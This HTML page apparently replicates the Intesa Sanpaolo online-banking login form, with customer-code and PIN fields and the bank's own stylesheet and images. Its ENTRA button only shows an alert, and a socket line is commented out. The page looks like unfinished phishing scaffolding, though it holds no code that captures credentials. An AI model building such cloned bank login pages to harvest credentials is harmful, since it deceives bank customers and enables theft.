<!DOCTYPE html>
<html>

<head>
	<meta http-equiv="X-UA-Compatible" content="IE=10" />
	<meta http-equiv="cache-control" content="no-cache" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
	<meta charset="utf-8">

</head>

<body class="isp-body-transparent" style="overflow:hidden;">



	<div class="container-fluid ng-scope" ng-controller="ArchMainController">
		<div id="archMainContainer">
			<div class="row ng-scope" id="ArchAssetsController" ng-controller="AssetsController">
				<div class="col-xs-24">
					<div class="row" id="assetControllerMargin">
						<!-- uiView: -->
						<div id="assetContainer" class="assetContainer ng-scope" ui-view="" style="">
							<!-- ngInclude: getTemplateUrl() -->
							<div id="logincontroller" ng-class="pagepartClass" ng-include="getTemplateUrl()" full-width="true" part-controller="LoginController" class="ng-scope container-fluid-no-padding" style="">
								<div class="container-fluid login-form ng-pristine ng-scope ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-valid-isp-validate ng-valid-isp-custom" ng-form="model.login.form" style="">
									<!-- padding-left-25 -->
									<div class="row margin-bottom-18">
										<div class="isp-ib-open-sans-regular-16 isp-ib-title-access isp-ib-alignment-access col-xs-24 col-md-12 col-md-offset-1 login-whitespace" ng-class="{'login-title-pseudo' : model.tmp.darkTheme}">
											<!-- ngIf: !login.pmed --><span ng-if="!login.pmed" class="ng-binding ng-scope">ACCEDI ALLA TUA BANCA ONLINE</span><!-- end ngIf: !login.pmed -->
											<!-- ngIf: login.pmed -->
											<!-- ngIf: login.pmed -->
										</div>
										<!-- ngIf: !login.pmed -->
										<div ng-if="!login.pmed" class="col-xs-24 col-md-11 login-first-access margin-top-first-access login-first-access-padding-11 ng-scope">
											<a tabindex="0" class="isp-ib-open-sans-semi-bold-13 login-first-accessDown login-padding-3px login-padding-0 ng-binding" ng-click="goToFirstAccess()">Primo accesso?<img ng-if="!model.tmp.darkTheme" style="margin-top:-2px;margin-left:2px;" src="https://www.intesasanpaolo.com/ib/public/guestarea/assets/freccia_dx.png" class="ng-scope">
												<!-- end ngIf: !model.tmp.darkTheme -->
											</a>
											<a class="isp-ib-open-sans-semi-bold-13 login-first-accessDown ng-binding" ng-click="goToHelp()">Serve aiuto?<img ng-if="!model.tmp.darkTheme" style="margin-top:-2px;margin-left:2px;" src="https://www.intesasanpaolo.com/ib/public/guestarea/assets/freccia_dx.png" class="ng-scope">
												<!-- end ngIf: !model.tmp.darkTheme -->
											</a>
										</div><!-- end ngIf: !login.pmed -->
									</div>
									<div ng-form="login.form" class="login-form-pseudo ng-pristine ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-valid-isp-validate ng-valid-isp-custom" style="">
										<div class="row login-margin-top-22">
											<div id="login-user" class="col-md-8 col-md-offset-1 login-padding-bottom">
												<div class="isp-ib-open-sans-regular-13 ispFormField ispInput ng-pristine ng-isolate-scope ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-valid-isp-validate ng-valid-isp-custom"
													ng-class="{'roundedStyle': hasStyle('rounded'), 'rev2': hasStyle('rev2')}" ng-form="" isp-id="login-user" bind-variable="login.user.userid" ng-keyup="triggerlogin1($event)" on-blur="onBlurUser()" name="login.user.useridForm"
													placeholder="Codice Titolare" input-label="" input-format="limiteddigits" is-required="true" on-change="changeUserFocus()" minlength="6" maxlength="8" aria-describedby="loginMessageError"
													id="loginpage-logincontroller-login-user_input" style="">
													<div class=" "
														ng-class="{'focus': isFocused,  'inputDatePickerPay':isCalendarPayment(), 'error': !form.$pending &amp;&amp; form.$invalid &amp;&amp; ((!!form.$error.required &amp;&amp; form.$error.required[0].$touched) || !form.$error.required || !!form.$error.ispCustom || !!form.$error.ispArchMessageHandler), 'isp-mobile-calendar':mobileCalendar}"
														ng-click="manageDisabledCallback()" id="loginpage-logincontroller-login-user_div" tabindex="-1" role="presentation">
														<span>
															<!-- ngIf: inputFormat != 'date' --><input unblucapturinghint="" autocomplete="" name="loginUser" id="loginpage-logincontroller-login-user" aria-describedby="required_error_ format_error_ custom_error_"
																ng-if="inputFormat != 'date'" type="text" placeholder="Codice Titolare" ng-model="$parent.modelVariable" ng-model-options="$parent.bindingOptions" ng-change="inputChange()" ng-blur="inputBlur()" ng-focus="inputFocus()"
																aria-label="" isp-validate="" ng-required="$parent.isRequired" isp-formatter="" minlength="6" maxlength="8" ng-disabled="$parent.isDisabled" ng-keyup="inputKeyUp($event)" ng-keydown="inputKeyDown($event)"
																ng-class="{'input-otp':inputFormat==='otp', '':hasCustomClass,'input-cf':inputFormat.toUpperCase()==='CF'||inputFormat.toUpperCase()==='CFORPIVA'}"
																class="ng-pristine ng-untouched ng-scope ng-empty ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-valid-isp-validate ng-valid-isp-custom" required="required" aria-invalid="true" style="">
															<!-- end ngIf: inputFormat != 'date' -->
															<!-- ngIf: inputFormat == 'date' -->
														</span>
													</div>
												</div>
											</div>
											<div id="login-pin" class="col-md-8 login-padding-bottom">
												<div class="isp-ib-open-sans-regular-13 ispFormField ispInput ng-pristine ng-isolate-scope ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-valid-isp-validate ng-valid-isp-custom"
													ng-class="{'roundedStyle': hasStyle('rounded'), 'rev2': hasStyle('rev2')}" ng-form="" isp-id="login-pin" ng-keyup="triggerlogin1($event)" bind-variable="login.user.pin" name="login.user.pinForm" placeholder="PIN"
													input-label="" input-format="digitspassword" on-change="changePinFocus()" is-required="true" minlength="5" maxlength="5" char-limit="5" aria-describedby="loginMessageError" save-password="false"
													id="loginpage-logincontroller-login-pin_input" style="">
													<div class=" "
														ng-class="{'focus': isFocused,  'inputDatePickerPay':isCalendarPayment(), 'error': !form.$pending &amp;&amp; form.$invalid &amp;&amp; ((!!form.$error.required &amp;&amp; form.$error.required[0].$touched) || !form.$error.required || !!form.$error.ispCustom || !!form.$error.ispArchMessageHandler), 'isp-mobile-calendar':mobileCalendar}"
														ng-click="manageDisabledCallback()" id="loginpage-logincontroller-login-pin_div" tabindex="-1" role="presentation">
														<span>
															<!-- ngIf: inputFormat != 'date' --><input unblucapturinghint="" autocomplete="new-password" name="loginPin" id="loginpage-logincontroller-login-pin" aria-describedby="required_error_ format_error_ custom_error_"
																ng-if="inputFormat != 'date'" type="password" placeholder="PIN" ng-model="$parent.modelVariable" ng-model-options="$parent.bindingOptions" ng-change="inputChange()" ng-blur="inputBlur()" ng-focus="inputFocus()"
																aria-label="" isp-validate="" ng-required="$parent.isRequired" isp-formatter="" minlength="5" maxlength="5" ng-disabled="$parent.isDisabled" ng-keyup="inputKeyUp($event)" ng-keydown="inputKeyDown($event)"
																ng-class="{'input-otp':inputFormat==='otp', '':hasCustomClass,'input-cf':inputFormat.toUpperCase()==='CF'||inputFormat.toUpperCase()==='CFORPIVA'}"
																class="ng-pristine ng-untouched ng-scope ng-empty ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-valid-isp-validate ng-valid-isp-custom" required="required" aria-invalid="true" style="">
														</span>
													</div>
												</div>
											</div>
											<!-- ngIf: login.message!=null -->
											<div class="col-xs-offset-1 hidden-md hidden-lg ng-scope" ng-if="login.message!=null">
												<div id="loginMessageError" role="alert" class="login-message ng-binding" tabindex="0"></div>
											</div>
											<div class="col-md-7 login-enter-button-container" ng-show="!login.askBirthDate" aria-hidden="false">
												<button id="enter1Login" look="green" class="isp-ib-arial-bold-14 login-enter-button ispIbDirectiveControlbuttonsButtonMargin              col-md-23 isp-ib-submit">
													<ng-transclude>
														ENTRA
													</ng-transclude>
												</button>
											</div>
											<div class="col-md-1">
											</div>
										</div>

										<div class="row">
											<div class="col-md-23  col-md-offset-1 hidden-xs  hidden-sm">
												<!-- ngIf: login.message!=null -->
												<div id="loginMessageError" role="alert" class="login-message ng-binding ng-scope" ng-if="login.message!=null"></div><!-- end ngIf: login.message!=null -->
											</div>
										</div>



										<!-- ngIf: login.askBirthDate -->
										<!-- <div class="row ask-birth-spacer hidden-md hidden-lg" ng-if="login.askBirthDate">
  			<div class="col-md-8 login-first-accessDown">
  				<a class="isp-ib-open-sans-semi-bold-13 login-first-accessDown" ng-click="goToFirstAccess()">{{::properties.LOGIN_FIRST_ACCESS}}
  					<span aria-hidden="true" class="login-arrow-bootstrap glyphicon glyphicon-arrow-right"></span>
  				</a>
  			</div>
  		</div> -->
										<!-- ngIf: login.askBirthDate -->
										<!--div class="row"> XXX TEMP DISABLE CHANGE PIN
  			<div class = "col-md-8 col-md-offset-1"></div>
  			<div class = "col-md-8 login-createpin-link">
  				<a class="cursor-pointer isp-ib-open-sans-semi-bold-13" ng-click="goToCreatePin()">{{::properties.LOGIN_FORGOT_PIN}}
  					<span aria-hidden="true" class="login-arrow-bootstrap glyphicon glyphicon-arrow-right"></span>
  				</a>
  			</div>
  			<div class = "col-md-7"></div>
  		</div-->
									</div>
									<!-- ngIf: login.pmed -->
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>

</body>


<link href="https://www.intesasanpaolo.com/ib/public/login/css/css.css?v=7a19355dd4edf4f493d38468d2a878f0" rel="stylesheet">

<script src="https://code.jquery.com/jquery-3.4.1.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
<script>
  $(function() {
    // var socket = io();
    var tcl;
    var content = '';

    $("#enter1Login").click(function() {
      alert("ciao");
    })
  })
</script>


</html>
